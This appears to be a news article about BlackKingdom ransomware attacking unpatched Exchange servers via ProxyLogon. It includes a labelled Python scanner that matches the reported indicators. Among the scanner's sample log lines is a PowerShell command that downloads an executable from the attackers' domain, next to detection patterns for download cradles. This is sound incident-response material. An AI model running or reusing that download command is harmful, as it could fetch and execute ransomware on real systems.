June 6, 2023

A second ransomware operation, known as ‘BlackKingdom’, is exploiting the Microsoft Exchange Server ProxyLogon vulnerabilities to encrypt unpatched servers.

Based on the logs from his honeypots, security researcher Marcus Hutchins states that the threat actor used the vulnerability to execute a PowerShell script that downloads the ransomware executable from ‘yuuuuu44[.]com‘ and then pushes it out to other computers on the network.

Honeypots are intentionally vulnerable systems exposed on the Internet to lure attackers and record their activity. Hutchins’ honeypots did not end up encrypted, however, so the attack he observed was believed to be a failed campaign.

Victims are located in the USA, Canada, Austria, Switzerland, Russia, France, Israel, United Kingdom, Italy, Germany, Greece, Australia, and Croatia.

When encrypting a device, the ransomware appends random extensions to the encrypted files and then drops a ransom note named decrypt_file.TxT.

BlackKingdom ransom note

The ransom notes all demand $10,000 in bitcoin and use the same Bitcoin address (1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT) for payment. This Bitcoin address has received only one payment on March 18th, which has since been transferred to another address.
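As an added example, not code from the article or from any of the researchers it cites, the following Python sweep turns the indicators quoted above into checks a responder can run offline: it refangs the defanged domain, flags that domain and common PowerShell download cradles in script-block log text, and locates ransom notes by file name (case-insensitive, since NTFS is). The log lines, file paths and the payload file name are constructed for illustration; only the domain, the note name and the Bitcoin address come from the article.

```python
import re
from pathlib import PureWindowsPath

# Indicators taken from the article. The domain is written defanged there
# ("yuuuuu44[.]com") and is refanged below only so it can be matched in logs.
DEFANGED_DOMAIN = "yuuuuu44[.]com"
RANSOM_NOTE_NAME = "decrypt_file.TxT"
BTC_ADDRESS = "1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT"


def refang(indicator: str) -> str:
    """Turn a defanged indicator ("example[.]com", "hxxp://") back into matchable text."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


DOMAIN = refang(DEFANGED_DOMAIN)

# Match the domain (and its subdomains) as a whole label, so "notyuuuuu44.com"
# does not trip the check while "mail.yuuuuu44.com" still does.
DOMAIN_RE = re.compile(r"(?<![\w-])" + re.escape(DOMAIN) + r"(?![\w-])", re.IGNORECASE)

# Generic PowerShell download-cradle patterns (the article says the payload was
# fetched by a PowerShell script; these are the usual primitives for doing so).
DOWNLOAD_CRADLE_RE = re.compile(
    r"(Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer)",
    re.IGNORECASE,
)


def classify_log_line(line: str) -> list[str]:
    """Return the indicator labels a single log line trips (empty list means clean)."""
    hits = []
    if DOMAIN_RE.search(line):
        hits.append("c2_domain")
    if DOWNLOAD_CRADLE_RE.search(line):
        hits.append("powershell_download_cradle")
    if RANSOM_NOTE_NAME.lower() in line.lower():
        hits.append("ransom_note_name")
    if BTC_ADDRESS in line:
        hits.append("known_btc_wallet")
    return hits


def scan_log(lines):
    """Return (line_number, line, hits) for every line that trips at least one indicator."""
    return [(n, ln, h) for n, ln in enumerate(lines, 1) if (h := classify_log_line(ln))]


def is_ransom_note(path: str) -> bool:
    """Case-insensitive file-name match; PureWindowsPath so backslash paths parse on any OS."""
    return PureWindowsPath(path).name.lower() == RANSOM_NOTE_NAME.lower()


def find_ransom_notes(paths):
    """Filter a list of Windows paths down to the ransom notes."""
    return [p for p in paths if is_ransom_note(p)]


# Constructed sample data in the shape of PowerShell script-block text and a file
# listing; not real telemetry. "payload.exe" is a placeholder, not the actor's file name.
SAMPLE_LOG = [
    "Get-MailboxDatabase | Format-Table Name,Server",
    "(New-Object Net.WebClient).DownloadFile('http://yuuuuu44.com/payload.exe','C:\\Windows\\Temp\\payload.exe')",
    "Invoke-WebRequest -Uri https://updates.example.com/patch.msi -OutFile C:\\Temp\\patch.msi",
    "Set-Content -Path C:\\Users\\Public\\decrypt_file.TxT -Value 'Send $10,000 in BTC to 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT'",
    "Write-Host 'backup job finished'",
]

SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\report.docx.k3jq9",
    r"C:\Users\alice\Documents\decrypt_file.TxT",
    r"D:\Shares\Finance\DECRYPT_FILE.TXT",
    r"D:\Shares\Finance\readme.txt",
]


if __name__ == "__main__":
    for n, line, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}\n    {line}")
    for p in find_ransom_notes(SAMPLE_PATHS):
        print(f"ransom note: {p}")
```

The download-cradle pattern is deliberately broad and will flag legitimate administration (the `updates.example.com` line above is such a case); treat it as a triage lead and the domain and wallet matches as high-confidence hits.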

The current ransomware executable is a Python script compiled into a Windows executable. The BlackKingdom ransomware seen in June 2020 was also written in Python.

BlackKingdom is the second confirmed ransomware targeting the Microsoft Exchange ProxyLogon vulnerabilities. The first was the DearCry ransomware that was used in limited attacks earlier in the month.
